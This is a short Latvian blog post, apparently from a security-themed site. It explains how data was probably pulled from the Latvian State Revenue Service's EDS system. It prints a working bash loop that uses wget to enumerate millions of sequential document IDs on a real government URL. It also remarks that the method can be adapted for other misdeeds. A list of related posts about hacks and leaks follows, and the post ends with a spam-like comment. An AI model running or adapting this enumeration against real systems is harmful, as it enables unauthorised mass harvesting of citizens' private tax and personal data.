Šodien klejojot par netu atradu veidu kā iespējams tika nopumpēti dati no EDS sistēmas.
Viss ģeniālais ir vienkāršs un lai cilvēki redzētu cik tieši tas ir vienkārši tad pārpublicēju pašu kodu, kas varēja izskatīties aptuveni šāds:
Linux veidīgā konsolē uzrakstām un priecājamies
for i in {1..7500000}; do
wget http://www2.vid.gov.lv/eds/Pages/GetDuf.aspx?id=$i;
done
Šis piemērs parāda veidu kādā šādas ievainojamības izmantot un attiecīgi modificējot piedzīt arī citiem nedarbiem.
Related posts:
- No VID EDS tiek nopludināta informācija
- Hackeri uzbrūk vai gadās arī tā
- Second step in forensic investigation vai hackeri uzbrūk 2
- Lejupielādēti un sistematizēti ap 100 miljonu facebook lietotāju datu
- Drošības caurums CSDD un Parex mājaslapā
- Atvērtā koda portālu sistēmas- iespēja ietaupit vai nopelnīt?
- Kā mērīt Linux noslodzi?
- Nozagtas Facebook lietotāju paroles
- Uzlauzts Chrysler.lv
- Aizstājam vai izmainām izvadāmo kodu izmantojot javascript
Absolutely first rate and copper-bottomed, getnelemn!